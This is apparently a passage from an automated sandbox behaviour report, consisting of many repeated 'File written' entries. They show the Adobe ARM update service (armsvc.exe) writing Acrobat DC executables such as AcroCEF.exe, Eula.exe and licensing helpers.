            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
